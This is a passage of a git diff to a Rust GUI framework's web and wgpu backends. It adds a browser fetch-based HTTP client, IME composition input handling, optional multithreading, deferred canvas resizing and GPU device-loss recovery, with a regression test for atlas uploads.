would only drop cancelled tasks, that way we could detect leaks due to task <-> entity + // cycles as cancelled tasks will be dropped properly once they runnable gets run again + // + // async-task does not give us the power to do this just yet though + dispatcher.drain_tasks(); + drop(dispatcher); }, #on_failure_fn_name, ); diff --git a/crates/gpui_platform/Cargo.toml b/crates/gpui_platform/Cargo.toml index cfb47b1851b9e792c31fad9aca79b3671095b603..22d44a96b21112336f3bee669c218c2291f78b65 100644 --- a/crates/gpui_platform/Cargo.toml +++ b/crates/gpui_platform/Cargo.toml @@ -28,6 +28,7 @@ gpui_macos.workspace = true [target.'cfg(target_os = "windows")'.dependencies] gpui_windows.workspace = true +gpui = { workspace = true, features = ["windows-manifest"] } [target.'cfg(any(target_os = "linux", target_os = "freebsd"))'.dependencies] gpui_linux.workspace = true diff --git a/crates/gpui_platform/src/gpui_platform.rs b/crates/gpui_platform/src/gpui_platform.rs index 86c0577f75ff4ac61ab7a4d956b7e34718fb26e5..1d2fea90b477542031dfbf591f458b2427ec6e01 100644 --- a/crates/gpui_platform/src/gpui_platform.rs +++ b/crates/gpui_platform/src/gpui_platform.rs @@ -18,6 +18,12 @@ pub fn headless() -> gpui::Application { gpui::Application::with_platform(current_platform(true)) } +/// Unlike `application`, this function returns a single-threaded web application. +#[cfg(target_family = "wasm")] +pub fn single_threaded_web() -> gpui::Application { + gpui::Application::with_platform(Rc::new(gpui_web::WebPlatform::new(false))) +} + /// Initializes panic hooks and logging for the web platform. /// Call this before running the application in a wasm_bindgen entrypoint. #[cfg(target_family = "wasm")] @@ -49,7 +55,23 @@ pub fn current_platform(headless: bool) -> Rc { #[cfg(target_family = "wasm")] { let _ = headless; - Rc::new(gpui_web::WebPlatform::new()) + Rc::new(gpui_web::WebPlatform::new(true)) + } +} + +/// Returns a new [`HeadlessRenderer`] for the current platform, if available. +#[cfg(feature = "test-support")] +pub fn current_headless_renderer() -> Option> { + #[cfg(target_os = "macos")] + { + Some(Box::new( + gpui_macos::metal_renderer::MetalHeadlessRenderer::new(), + )) + } + + #[cfg(not(target_os = "macos"))] + { + None } } diff --git a/crates/gpui_web/Cargo.toml b/crates/gpui_web/Cargo.toml index a2bb95a9f4bb3007a2a2feb9f7483d38dff3cf1d..5980fa5e855214e1d240dcaaacd59ae4bb6f3537 100644 --- a/crates/gpui_web/Cargo.toml +++ b/crates/gpui_web/Cargo.toml @@ -9,6 +9,10 @@ autoexamples = false [lints] workspace = true +[features] +default = ["multithreaded"] +multithreaded = ["dep:wasm_thread"] + [lib] path = "src/gpui_web.rs" @@ -16,6 +20,7 @@ path = "src/gpui_web.rs" gpui.workspace = true parking_lot = { workspace = true, features = ["nightly"] } gpui_wgpu.workspace = true +http_client.workspace = true anyhow.workspace = true futures.workspace = true log.workspace = true @@ -27,9 +32,10 @@ web-time.workspace = true console_error_panic_hook = "0.1.7" js-sys = "0.3" raw-window-handle = "0.6" -wasm_thread = { version = "0.3", features = ["es_modules"] } +wasm_thread = { version = "0.3", features = ["es_modules"], optional = true } web-sys = { version = "0.3", features = [ "console", + "CompositionEvent", "CssStyleDeclaration", "DataTransfer", "Document", @@ -56,6 +62,11 @@ web-sys = { version = "0.3", features = [ "Screen", "Storage", "VisualViewport", + "Headers", + "Request", + "RequestInit", + "RequestRedirect", + "Response", "WheelEvent", "Window", ] } diff --git a/crates/gpui_web/src/dispatcher.rs b/crates/gpui_web/src/dispatcher.rs index ca0b700a1bf0bc75e1dafd859b59a04540524f63..5a0911f7ef1a33d1959de6d03f9f9797978b7a9b 100644 --- a/crates/gpui_web/src/dispatcher.rs +++ b/crates/gpui_web/src/dispatcher.rs @@ -8,8 +8,10 @@ use std::time::Duration; use wasm_bindgen::prelude::*; use web_time::Instant; +#[cfg(feature = "multithreaded")] const MIN_BACKGROUND_THREADS: usize = 2; +#[cfg(feature = "multithreaded")] fn shared_memory_supported() -> bool { let global = js_sys::global(); let has_shared_array_buffer = @@ -126,6 +128,7 @@ pub struct WebDispatcher { background_sender: PriorityQueueSender, main_thread_mailbox: Arc, supports_threads: bool, + #[cfg(feature = "multithreaded")] _background_threads: Vec>, } @@ -135,11 +138,18 @@ unsafe impl Send for WebDispatcher {} unsafe impl Sync for WebDispatcher {} impl WebDispatcher { - pub fn new(browser_window: web_sys::Window) -> Self { + pub fn new(browser_window: web_sys::Window, allow_threads: bool) -> Self { + #[cfg(feature = "multithreaded")] let (background_sender, background_receiver) = PriorityQueueReceiver::new(); + #[cfg(not(feature = "multithreaded"))] + let (background_sender, _) = PriorityQueueReceiver::new(); let main_thread_mailbox = Arc::new(MainThreadMailbox::new()); - let supports_threads = shared_memory_supported(); + + #[cfg(feature = "multithreaded")] + let supports_threads = allow_threads && shared_memory_supported(); + #[cfg(not(feature = "multithreaded"))] + let supports_threads = false; if supports_threads { main_thread_mailbox.run_waker_loop(browser_window.clone()); @@ -149,6 +159,7 @@ impl WebDispatcher { ); } + #[cfg(feature = "multithreaded")] let background_threads = if supports_threads { let thread_count = browser_window .navigator() @@ -173,10 +184,6 @@ impl WebDispatcher { } }; - if runnable.metadata().is_closed() { - continue; - } - runnable.run(); } }) @@ -193,6 +200,7 @@ impl WebDispatcher { background_sender, main_thread_mailbox, supports_threads, + #[cfg(feature = "multithreaded")] _background_threads: background_threads, } } @@ -251,9 +259,7 @@ impl PlatformDispatcher for WebDispatcher { let millis = duration.as_millis().min(i32::MAX as u128) as i32; if self.on_main_thread() { let callback = Closure::once_into_js(move || { - if !runnable.metadata().is_closed() { - runnable.run(); - } + runnable.run(); }); self.browser_window .set_timeout_with_callback_and_timeout_and_arguments_0( @@ -288,15 +294,11 @@ impl PlatformDispatcher for WebDispatcher { fn execute_on_main_thread(window: &web_sys::Window, item: MainThreadItem) { match item { MainThreadItem::Runnable(runnable) => { - if !runnable.metadata().is_closed() { - runnable.run(); - } + runnable.run(); } MainThreadItem::Delayed { runnable, millis } => { let callback = Closure::once_into_js(move || { - if !runnable.metadata().is_closed() { - runnable.run(); - } + runnable.run(); }); window .set_timeout_with_callback_and_timeout_and_arguments_0( @@ -313,9 +315,7 @@ fn execute_on_main_thread(window: &web_sys::Window, item: MainThreadItem) { fn schedule_runnable(window: &web_sys::Window, runnable: RunnableVariant, priority: Priority) { let callback = Closure::once_into_js(move || { - if !runnable.metadata().is_closed() { - runnable.run(); - } + runnable.run(); }); let callback: &js_sys::Function = callback.unchecked_ref(); diff --git a/crates/gpui_web/src/events.rs b/crates/gpui_web/src/events.rs index 5f6d8527e70a3778a46a11e00758e822790e742f..e93534fbe88238118ce0a1e819aec5ff3c3d201a 100644 --- a/crates/gpui_web/src/events.rs +++ b/crates/gpui_web/src/events.rs @@ -1,10 +1,10 @@ use std::rc::Rc; use gpui::{ - Capslock, ExternalPaths, FileDropEvent, KeyDownEvent, KeyUpEvent, Keystroke, Modifiers, - ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseExitEvent, MouseMoveEvent, - MouseUpEvent, NavigationDirection, Pixels, PlatformInput, Point, ScrollDelta, ScrollWheelEvent, - TouchPhase, point, px, + Capslock, DispatchEventResult, ExternalPaths, FileDropEvent, KeyDownEvent, KeyUpEvent, + Keystroke, Modifiers, ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseExitEvent, + MouseMoveEvent, MouseUpEvent, NavigationDirection, Pixels, PlatformInput, Point, ScrollDelta, + ScrollWheelEvent, TouchPhase, point, px, }; use smallvec::smallvec; use wasm_bindgen::prelude::*; @@ -64,6 +64,9 @@ impl WebWindowInner { self.register_dragleave(), self.register_key_down(), self.register_key_up(), + self.register_composition_start(), + self.register_composition_update(), + self.register_composition_end(), self.register_focus(), self.register_blur(), self.register_pointer_enter(), @@ -87,6 +90,18 @@ impl WebWindowInner { closure } + fn listen_input( + self: &Rc, + event_name: &str, + handler: impl FnMut(JsValue) + 'static, + ) -> Closure { + let closure = Closure::::new(handler); + self.input_element + .add_event_listener_with_callback(event_name, closure.as_ref().unchecked_ref()) + .ok(); + closure + } + /// Registers a listener with `{passive: false}` so that `preventDefault()` works. /// Needed for events like `wheel` which are passive by default in modern browsers. fn listen_non_passive( @@ -109,11 +124,9 @@ impl WebWindowInner { closure } - fn dispatch_input(&self, input: PlatformInput) { + fn dispatch_input(&self, input: PlatformInput) -> Option { let mut borrowed = self.callbacks.borrow_mut(); - if let Some(ref mut callback) = borrowed.input { - callback(input); - } + borrowed.input.as_mut().map(|callback| callback(input)) } fn register_pointer_down(self: &Rc) -> Closure { @@ -121,7 +134,7 @@ impl WebWindowInner { self.listen("pointerdown", move |event: JsValue| { let event: web_sys::PointerEvent = event.unchecked_into(); event.prevent_default(); - this.canvas.focus().ok(); + this.input_element.focus().ok(); let button = dom_mouse_button_to_gpui(event.button()); let position = pointer_position_in_element(&event); @@ -315,7 +328,7 @@ impl WebWindowInner { fn register_key_down(self: &Rc) -> Closure { let this = Rc::clone(self); - self.listen("keydown", move |event: JsValue| { + self.listen_input("keydown", move |event: JsValue| { let event: web_sys::KeyboardEvent = event.unchecked_into(); let modifiers = modifiers_from_keyboard_event(&event, this.is_mac); @@ -346,20 +359,38 @@ impl WebWindowInner { let keystroke = Keystroke { modifiers, key, - key_char, + key_char: key_char.clone(), }; - this.dispatch_input(PlatformInput::KeyDown(KeyDownEvent { + let result = this.dispatch_input(PlatformInput::KeyDown(KeyDownEvent { keystroke, is_held, prefer_character_input: false, })); + + if let Some(result) = result { + if !result.propagate { + return; + } + } + + if this.is_composing.get() || event.is_composing() { + return; + } + + if modifiers.is_subset_of(&Modifiers::shift()) { + if let Some(text) = key_char { + this.with_input_handler(|handler| { + handler.replace_text_in_range(None, &text); + }); + } + } }) } fn register_key_up(self: &Rc) -> Closure { let this = Rc::clone(self); - self.listen("keyup", move |event: JsValue| { + self.listen_input("keyup", move |event: JsValue| { let event: web_sys::KeyboardEvent = event.unchecked_into(); let modifiers = modifiers_from_keyboard_event(&event, this.is_mac); @@ -396,9 +427,42 @@ impl WebWindowInner { }) } + fn register_composition_start(self: &Rc) -> Closure { + let this = Rc::clone(self); + self.listen_input("compositionstart", move |_event: JsValue| { + this.is_composing.set(true); + }) + } + + fn register_composition_update(self: &Rc) -> Closure { + let this = Rc::clone(self); + self.listen_input("compositionupdate", move |event: JsValue| { + let event: web_sys::CompositionEvent = event.unchecked_into(); + let data = event.data().unwrap_or_default(); + this.is_composing.set(true); + this.with_input_handler(|handler| { + handler.replace_and_mark_text_in_range(None, &data, None); + }); + }) + } + + fn register_composition_end(self: &Rc) -> Closure { + let this = Rc::clone(self); + self.listen_input("compositionend", move |event: JsValue| { + let event: web_sys::CompositionEvent = event.unchecked_into(); + let data = event.data().unwrap_or_default(); + this.is_composing.set(false); + this.with_input_handler(|handler| { + handler.replace_text_in_range(None, &data); + handler.unmark_text(); + }); + this.input_element.set_value(""); + }) + } + fn register_focus(self: &Rc) -> Closure { let this = Rc::clone(self); - self.listen("focus", move |_event: JsValue| { + self.listen_input("focus", move |_event: JsValue| { { let mut state = this.state.borrow_mut(); state.is_active = true; @@ -412,7 +476,7 @@ impl WebWindowInner { fn register_blur(self: &Rc) -> Closure { let this = Rc::clone(self); - self.listen("blur", move |_event: JsValue| { + self.listen_input("blur", move |_event: JsValue| { { let mut state = this.state.borrow_mut(); state.is_active = false; @@ -556,7 +620,10 @@ pub(crate) fn is_mac_platform(browser_window: &web_sys::Window) -> bool { } fn is_modifier_only_key(key: &str) -> bool { - matches!(key, "control" | "alt" | "shift" | "platform" | "capslock") + matches!( + key, + "control" | "alt" | "shift" | "platform" | "capslock" | "compose" | "process" + ) } fn compute_key_char( diff --git a/crates/gpui_web/src/gpui_web.rs b/crates/gpui_web/src/gpui_web.rs index 966ff3b0d7d90219e8cf702a16fce598f813c835..9cd773823bd9b65ef99cb89c12184919a4c45dc2 100644 --- a/crates/gpui_web/src/gpui_web.rs +++ b/crates/gpui_web/src/gpui_web.rs @@ -3,6 +3,7 @@ mod dispatcher; mod display; mod events; +mod http_client; mod keyboard; mod logging; mod platform; @@ -10,6 +11,7 @@ mod window; pub use dispatcher::WebDispatcher; pub use display::WebDisplay; +pub use http_client::FetchHttpClient; pub use keyboard::WebKeyboardLayout; pub use logging::init_logging; pub use platform::WebPlatform; diff --git a/crates/gpui_web/src/http_client.rs b/crates/gpui_web/src/http_client.rs new file mode 100644 index 0000000000000000000000000000000000000000..14d58cf45766885af76f49892589f70b89fb8116 --- /dev/null +++ b/crates/gpui_web/src/http_client.rs @@ -0,0 +1,199 @@ +use anyhow::anyhow; +use futures::AsyncReadExt as _; +use http_client::{AsyncBody, HttpClient, RedirectPolicy}; +use std::future::Future; +use std::pin::Pin; +use std::task::Poll; +use wasm_bindgen::JsCast as _; +use wasm_bindgen::prelude::*; + +#[wasm_bindgen] +extern "C" { + #[wasm_bindgen(catch, js_name = "fetch")] + fn global_fetch(input: &web_sys::Request) -> Result; +} + +pub struct FetchHttpClient { + user_agent: Option, +} + +impl Default for FetchHttpClient { + fn default() -> Self { + Self { user_agent: None } + } +} + +#[cfg(feature = "multithreaded")] +impl FetchHttpClient { + /// # Safety + /// + /// The caller must ensure that the created `FetchHttpClient` is only used in a single thread environment. + pub unsafe fn new() -> Self { + Self::default() + } + + /// # Safety + /// + /// The caller must ensure that the created `FetchHttpClient` is only used in a single thread environment. + pub unsafe fn with_user_agent(user_agent: &str) -> anyhow::Result { + Ok(Self { + user_agent: Some(http_client::http::header::HeaderValue::from_str( + user_agent, + )?), + }) + } +} + +#[cfg(not(feature = "multithreaded"))] +impl FetchHttpClient { + pub fn new() -> Self { + Self::default() + } + + pub fn with_user_agent(user_agent: &str) -> anyhow::Result { + Ok(Self { + user_agent: Some(http_client::http::header::HeaderValue::from_str( + user_agent, + )?), + }) + } +} + +/// Wraps a `!Send` future to satisfy the `Send` bound on `BoxFuture`. +/// +/// Safety: only valid in WASM contexts where the `FetchHttpClient` is +/// confined to a single thread (guaranteed by the caller via unsafe +/// constructors when `multithreaded` is enabled, or by the absence of +/// threads when it is not). +struct AssertSend(F); + +unsafe impl Send for AssertSend {} + +impl Future for AssertSend { + type Output = F::Output; + + fn poll(self: Pin<&mut Self>, cx: &mut std::task::Context<'_>) -> Poll { + // Safety: pin projection for a single-field newtype wrapper. + let inner = unsafe { self.map_unchecked_mut(|this| &mut this.0) }; + inner.poll(cx) + } +} + +impl HttpClient for FetchHttpClient { + fn user_agent(&self) -> Option<&http_client::http::header::HeaderValue> { + self.user_agent.as_ref() + } + + fn proxy(&self) -> Option<&http_client::Url> { + None + } + + fn send( + &self, + req: http_client::http::Request, + ) -> futures::future::BoxFuture<'static, anyhow::Result>> + { + let (parts, body) = req.into_parts(); + + Box::pin(AssertSend(async move { + let body_bytes = read_body_to_bytes(body).await?; + + let init = web_sys::RequestInit::new(); + init.set_method(parts.method.as_str()); + + if let Some(redirect_policy) = parts.extensions.get::() { + match redirect_policy { + RedirectPolicy::NoFollow => { + init.set_redirect(web_sys::RequestRedirect::Manual); + } + RedirectPolicy::FollowLimit(_) | RedirectPolicy::FollowAll => { + init.set_redirect(web_sys::RequestRedirect::Follow); + } + } + } + + if let Some(ref bytes) = body_bytes { + let uint8array = js_sys::Uint8Array::from(bytes.as_slice()); + init.set_body(uint8array.as_ref()); + } + + let url = parts.uri.to_string(); + let request = web_sys::Request::new_with_str_and_init(&url, &init) + .map_err(|error| anyhow!("failed to create fetch Request: {error:?}"))?; + + let request_headers = request.headers(); + for (name, value) in &parts.headers { + let value_str = value + .to_str() + .map_err(|_| anyhow!("non-ASCII header value for {name}"))?; + request_headers + .set(name.as_str(), value_str) + .map_err(|error| anyhow!("failed to set header {name}: {error:?}"))?; + } + + let promise = global_fetch(&request) + .map_err(|error| anyhow!("fetch threw an error: {error:?}"))?; + let response_value = wasm_bindgen_futures::JsFuture::from(promise) + .await + .map_err(|error| anyhow!("fetch failed: {error:?}"))?; + + let web_response: web_sys::Response = response_value + .dyn_into() + .map_err(|error| anyhow!("fetch result is not a Response: {error:?}"))?; + + let status = web_response.status(); + let mut builder = http_client::http::Response::builder().status(status); + + // `Headers` is a JS iterable yielding `[name, value]` pairs. + // `js_sys::Array::from` calls `Array.from()` which accepts any iterable. + let header_pairs = js_sys::Array::from(&web_response.headers()); + for index in 0..header_pairs.length() { + match header_pairs.get(index).dyn_into::() { + Ok(pair) => match (pair.get(0).as_string(), pair.get(1).as_string()) { + (Some(name), Some(value)) => { + builder = builder.header(name, value); + } + (name, value) => { + log::warn!( + "skipping response header at index {index}: \ + name={name:?}, value={value:?}" + ); + } + }, + Err(entry) => { + log::warn!("skipping non-array header entry at index {index}: {entry:?}"); + } + } + } + + // The entire response body is eagerly buffered into memory via + // `arrayBuffer()`. The Fetch API does not expose a synchronous + // streaming interface; streaming would require `ReadableStream` + // interop which is significantly more complex. + let body_promise = web_response + .array_buffer() + .map_err(|error| anyhow!("failed to initiate response body read: {error:?}"))?; + let body_value = wasm_bindgen_futures::JsFuture::from(body_promise) + .await + .map_err(|error| anyhow!("failed to read response body: {error:?}"))?; + let array_buffer: js_sys::ArrayBuffer = body_value + .dyn_into() + .map_err(|error| anyhow!("response body is not an ArrayBuffer: {error:?}"))?; + let response_bytes = js_sys::Uint8Array::new(&array_buffer).to_vec(); + + builder + .body(AsyncBody::from(response_bytes)) + .map_err(|error| anyhow!(error)) + })) + } +} + +async fn read_body_to_bytes(mut body: AsyncBody) -> anyhow::Result>> { + let mut buffer = Vec::new(); + body.read_to_end(&mut buffer).await?; + if buffer.is_empty() { + Ok(None) + } else { + Ok(Some(buffer)) + } +} diff --git a/crates/gpui_web/src/platform.rs b/crates/gpui_web/src/platform.rs index 420b7cb3f470c683888aa76bd61236c1f1ff181e..4d78b71aa05b743f779d0e8a1e7ed8a5eac136f9 100644 --- a/crates/gpui_web/src/platform.rs +++ b/crates/gpui_web/src/platform.rs @@ -54,10 +54,13 @@ struct WebPlatformCallbacks { } impl WebPlatform { - pub fn new() -> Self { + pub fn new(allow_multi_threading: bool) -> Self { let browser_window = web_sys::window().expect("must be running in a browser window context"); - let dispatcher = Arc::new(WebDispatcher::new(browser_window.clone())); + let dispatcher = Arc::new(WebDispatcher::new( + browser_window.clone(), + allow_multi_threading, + )); let background_executor = BackgroundExecutor::new(dispatcher.clone()); let foreground_executor = ForegroundExecutor::new(dispatcher); let text_system = Arc::new(gpui_wgpu::CosmicTextSystem::new_without_system_fonts( diff --git a/crates/gpui_web/src/window.rs b/crates/gpui_web/src/window.rs index c29fa509dd206406b24069053dc71bdc4dc18e75..125432c0ae8814a43e8e742547742013d2a75c65 100644 --- a/crates/gpui_web/src/window.rs +++ b/crates/gpui_web/src/window.rs @@ -45,6 +45,7 @@ pub(crate) struct WebWindowMutableState { pub(crate) struct WebWindowInner { pub(crate) browser_window: web_sys::Window, pub(crate) canvas: web_sys::HtmlCanvasElement, + pub(crate) input_element: web_sys::HtmlInputElement, pub(crate) has_device_pixel_support: bool, pub(crate) is_mac: bool, pub(crate) state: RefCell, @@ -53,7 +54,9 @@ pub(crate) struct WebWindowInner { pub(crate) pressed_button: Cell>, pub(crate) last_physical_size: Cell<(u32, u32)>, pub(crate) notify_scale: Cell, + pub(crate) is_composing: Cell, mql_handle: RefCell>, + pending_physical_size: Cell>, } pub struct WebWindow { @@ -88,7 +91,7 @@ impl WebWindow { let max_texture_dimension = context.device.limits().max_texture_dimension_2d; let has_device_pixel_support = check_device_pixel_support(); - canvas.set_tab_index(0); + canvas.set_tab_index(-1); let style = canvas.style(); style @@ -113,7 +116,21 @@ impl WebWindow { body.append_child(&canvas) .map_err(|e| anyhow::anyhow!("Failed to append canvas to body: {e:?}"))?; - canvas.focus().ok(); + let input_element: web_sys::HtmlInputElement = document + .create_element("input") + .map_err(|e| anyhow::anyhow!("Failed to create input element: {e:?}"))? + .dyn_into() + .map_err(|e| anyhow::anyhow!("Created element is not an input: {e:?}"))?; + let input_style = input_element.style(); + input_style.set_property("position", "fixed").ok(); + input_style.set_property("top", "0").ok(); + input_style.set_property("left", "0").ok(); + input_style.set_property("width", "1px").ok(); + input_style.set_property("height", "1px").ok(); + input_style.set_property("opacity", "0").ok(); + body.append_child(&input_element) + .map_err(|e| anyhow::anyhow!("Failed to append input to body: {e:?}"))?; + input_element.focus().ok(); let device_size = Size { width: DevicePixels(0), @@ -123,6 +140,7 @@ impl WebWindow { let renderer_config = WgpuSurfaceConfig { size: device_size, transparent: false, + preferred_present_mode: None, }; let renderer = WgpuRenderer::new_from_canvas(context, &canvas, renderer_config)?; @@ -154,6 +172,7 @@ impl WebWindow { let inner = Rc::new(WebWindowInner { browser_window, canvas, + input_element, has_device_pixel_support, is_mac, state: RefCell::new(mutable_state), @@ -162,7 +181,9 @@ impl WebWindow { pressed_button: Cell::new(None), last_physical_size: Cell::new((0, 0)), notify_scale: Cell::new(false), + is_composing: Cell::new(false), mql_handle: RefCell::new(None), + pending_physical_size: Cell::new(None), }); let raf_closure = inner.create_raf_closure(); @@ -252,8 +273,9 @@ impl WebWindow { let clamped_width = physical_width.min(max_texture_dimension); let clamped_height = physical_height.min(max_texture_dimension); - inner.canvas.set_width(clamped_width); - inner.canvas.set_height(clamped_height); + inner + .pending_physical_size + .set(Some((clamped_width, clamped_height))); { let mut s = inner.state.borrow_mut(); @@ -262,10 +284,6 @@ impl WebWindow { height: px(logical_height), }; s.scale_factor = dpr_f32; - s.renderer.update_drawable_size(Size { - width: DevicePixels(clamped_width as i32), - height: DevicePixels(clamped_height as i32), - }); } let new_size = Size { @@ -390,6 +408,16 @@ impl WebWindowInner { Some(closure) } + pub(crate) fn with_input_handler( + &self, + f: impl FnOnce(&mut PlatformInputHandler) -> R, + ) -> Option { + let mut handler = self.state.borrow_mut().input_handler.take()?; + let result = f(&mut handler); + self.state.borrow_mut().input_handler = Some(handler); + Some(result) + } + pub(crate) fn register_appearance_change( self: &Rc, ) -> Option> { @@ -637,6 +665,20 @@ impl PlatformWindow for WebWindow { } fn draw(&self, scene: &Scene) { + if let Some((width, height)) = self.inner.pending_physical_size.take() { + if self.inner.canvas.width() != width || self.inner.canvas.height() != height { + self.inner.canvas.set_width(width); + self.inner.canvas.set_height(height); + } + + let mut state = self.inner.state.borrow_mut(); + state.renderer.update_drawable_size(Size { + width: DevicePixels(width as i32), + height: DevicePixels(height as i32), + }); + drop(state); + } + self.inner.state.borrow_mut().renderer.draw(scene); } diff --git a/crates/gpui_wgpu/src/gpui_wgpu.rs b/crates/gpui_wgpu/src/gpui_wgpu.rs index a306a9d4cac2251a46cd1115462bdcbe4b368759..452c3c03f51282c34368527dd503b90b92193586 100644 --- a/crates/gpui_wgpu/src/gpui_wgpu.rs +++ b/crates/gpui_wgpu/src/gpui_wgpu.rs @@ -4,6 +4,7 @@ mod wgpu_context; mod wgpu_renderer; pub use cosmic_text_system::*; +pub use wgpu; pub use wgpu_atlas::*; pub use wgpu_context::*; -pub use wgpu_renderer::*; +pub use wgpu_renderer::{GpuContext, WgpuRenderer, WgpuSurfaceConfig}; diff --git a/crates/gpui_wgpu/src/wgpu_atlas.rs b/crates/gpui_wgpu/src/wgpu_atlas.rs index ffef3a65398c3f03639a8551506463f91a862c33..55f6edee21b9f2da02268c66c665c34d5b52066a 100644 --- a/crates/gpui_wgpu/src/wgpu_atlas.rs +++ b/crates/gpui_wgpu/src/wgpu_atlas.rs @@ -65,6 +65,17 @@ impl WgpuAtlas { view: texture.view.clone(), } } + + /// Handles device lost by clearing all textures and cached tiles. + /// The atlas will lazily recreate textures as needed on subsequent frames. + pub fn handle_device_lost(&self, device: Arc, queue: Arc) { + let mut lock = self.0.lock(); + lock.device = device; + lock.queue = queue; + lock.storage = WgpuAtlasStorage::default(); + lock.tiles_by_key.clear(); + lock.pending_uploads.clear(); + } } impl PlatformAtlas for WgpuAtlas { @@ -104,6 +115,8 @@ impl PlatformAtlas for WgpuAtlas { if let Some(mut texture) = texture_slot.take() { texture.decrement_ref_count(); if texture.is_unreferenced() { + lock.pending_uploads + .retain(|upload| upload.id != texture.id); lock.storage[id.kind] .free_list .push(texture.id.index as usize); @@ -217,7 +230,9 @@ impl WgpuAtlasState { fn flush_uploads(&mut self) { for upload in self.pending_uploads.drain(..) { - let texture = &self.storage[upload.id]; + let Some(texture) = self.storage.get(upload.id) else { + continue; + }; let bytes_per_pixel = texture.bytes_per_pixel(); self.queue.write_texture( @@ -275,6 +290,15 @@ impl ops::IndexMut for WgpuAtlasStorage { } } +impl WgpuAtlasStorage { + fn get(&self, id: AtlasTextureId) -> Option<&WgpuAtlasTexture> { + self[id.kind] + .textures + .get(id.index as usize) + .and_then(|t| t.as_ref()) + } +} + impl ops::Index for WgpuAtlasStorage { type Output = WgpuAtlasTexture; fn index(&self, id: AtlasTextureId) -> &Self::Output { @@ -330,3 +354,70 @@ impl WgpuAtlasTexture { self.live_atlas_keys == 0 } } + +#[cfg(all(test, not(target_family = "wasm")))] +mod tests { + use super::*; + use gpui::{ImageId, RenderImageParams}; + use pollster::block_on; + use std::sync::Arc; + + fn test_device_and_queue() -> anyhow::Result<(Arc, Arc)> { + block_on(async { + let instance = wgpu::Instance::new(wgpu::InstanceDescriptor { + backends: wgpu::Backends::all(), + flags: wgpu::InstanceFlags::default(), + backend_options: wgpu::BackendOptions::default(), + memory_budget_thresholds: wgpu::MemoryBudgetThresholds::default(), + display: None, + }); + let adapter = instance + .request_adapter(&wgpu::RequestAdapterOptions { + power_preference: wgpu::PowerPreference::LowPower, + compatible_surface: None, + force_fallback_adapter: false, + }) + .await + .map_err(|error| anyhow::anyhow!("failed to request adapter: {error}"))?; + let (device, queue) = adapter + .request_device(&wgpu::DeviceDescriptor { + label: Some("wgpu_atlas_test_device"), + required_features: wgpu::Features::empty(), + required_limits: wgpu::Limits::downlevel_defaults() + .using_resolution(adapter.limits()) + .using_alignment(adapter.limits()), + memory_hints: wgpu::MemoryHints::MemoryUsage, + trace: wgpu::Trace::Off, + experimental_features: wgpu::ExperimentalFeatures::disabled(), + }) + .await + .map_err(|error| anyhow::anyhow!("failed to request device: {error}"))?; + Ok((Arc::new(device), Arc::new(queue))) + }) + } + + #[test] + fn before_frame_skips_uploads_for_removed_texture() -> anyhow::Result<()> { + let (device, queue) = test_device_and_queue()?; + + let atlas = WgpuAtlas::new(device, queue); + let key = AtlasKey::Image(RenderImageParams { + image_id: ImageId(1), + frame_index: 0, + }); + let size = Size { + width: DevicePixels(1), + height: DevicePixels(1), + }; + let mut build = || Ok(Some((size, Cow::Owned(vec![0, 0, 0, 255])))); + + // Regression test: before the fix, this panicked in flush_uploads + atlas + .get_or_insert_with(&key, &mut build)? + .expect("tile should be created"); + atlas.remove(&key); + atlas.before_frame(); + + Ok(()) + } +} diff --git a/crates/gpui_wgpu/src/wgpu_context.rs b/crates/gpui_wgpu/src/wgpu_context.rs index 38a27d0623c821144a2b0ba4ed5cadaaceb03812..7c03c4752ebf2e76b04c384722f4a9c17054487a 100644 --- a/crates/gpui_wgpu/src/wgpu_context.rs +++ b/crates/gpui_wgpu/src/wgpu_context.rs @@ -3,6 +3,7 @@ use anyhow::Context as _; #[cfg(not(target_family = "wasm"))] use gpui_util::ResultExt; use std::sync::Arc; +use std::sync::atomic::{AtomicBool, Ordering}; pub struct WgpuContext { pub instance: wgpu::Instance, @@ -10,11 +11,22 @@ pub struct WgpuContext { pub device: Arc, pub queue: Arc, dual_source_blending: bool, + device_lost: Arc, +} + +#[derive(Clone, Copy)] +pub struct CompositorGpuHint { + pub vendor_id: u32, + pub device_id: u32, } impl WgpuContext { #[cfg(not(target_family = "wasm"))] - pub fn new(instance: wgpu::Instance, surface: &wgpu::Surface<'_>) -> anyhow::Result { + pub fn new( + instance: wgpu::Instance, + surface: &wgpu::Surface<'_>, + compositor_gpu: Option, + ) -> anyhow::Result { let device_id_filter = match std::env::var("ZED_DEVICE_ID") { Ok(val) => parse_pci_id(&val) .context("Failed to parse device ID from `ZED_DEVICE_ID` environment variable") @@ -27,24 +39,26 @@ impl WgpuContext { } }; - let adapter = pollster::block_on(Self::select_adapter( - &instance, - device_id_filter, - Some(surface), - ))?; - - let caps = surface.get_capabilities(&adapter); - if caps.formats.is_empty() { - let info = adapter.get_info(); - anyhow::bail!( - "No adapter compatible with the display surface could be found. \ - Best candidate {:?} (backend={:?}, device={:#06x}) reports no \ - supported surface formats.", - info.name, - info.backend, - info.device, - ); - } + // Select an adapter by actually testing surface configuration with the real device. + // This is the only reliable way to determine compatibility on hybrid GPU systems. + let (adapter, device, queue, dual_source_blending) = + pollster::block_on(Self::select_adapter_and_device( + &instance, + device_id_filter, + surface, + compositor_gpu.as_ref(), + ))?; + + let device_lost = Arc::new(AtomicBool::new(false)); + device.set_device_lost_callback({ + let device_lost = Arc::clone(&device_lost); + move |reason, message| { + log::error!("wgpu device lost: reason={reason:?}, message={message}"); + if reason != wgpu::DeviceLostReason::Destroyed { + device_lost.store(true, Ordering::Relaxed); + } + } + }); log::info!( "Selected GPU adapter: {:?} ({:?})", @@ -52,25 +66,24 @@ impl WgpuContext { adapter.get_info().backend ); - let (device, queue, dual_source_blending) = - pollster::block_on(Self::create_device(&adapter))?; - Ok(Self { instance, adapter, device: Arc::new(device), queue: Arc::new(queue), dual_source_blending, + device_lost, }) } #[cfg(target_family = "wasm")] pub async fn new_web() -> anyhow::Result { - let instance = wgpu::Instance::new(&wgpu::InstanceDescriptor { + let instance = wgpu::Instance::new(wgpu::InstanceDescriptor { backends: wgpu::Backends::BROWSER_WEBGPU | wgpu::Backends::GL, flags: wgpu::InstanceFlags::default(), backend_options: wgpu::BackendOptions::default(), memory_budget_thresholds: wgpu::MemoryBudgetThresholds::default(), + display: None, }); let adapter = instance @@ -88,6 +101,7 @@ impl WgpuContext { adapter.get_info().backend ); + let device_lost = Arc::new(AtomicBool::new(false)); let (device, 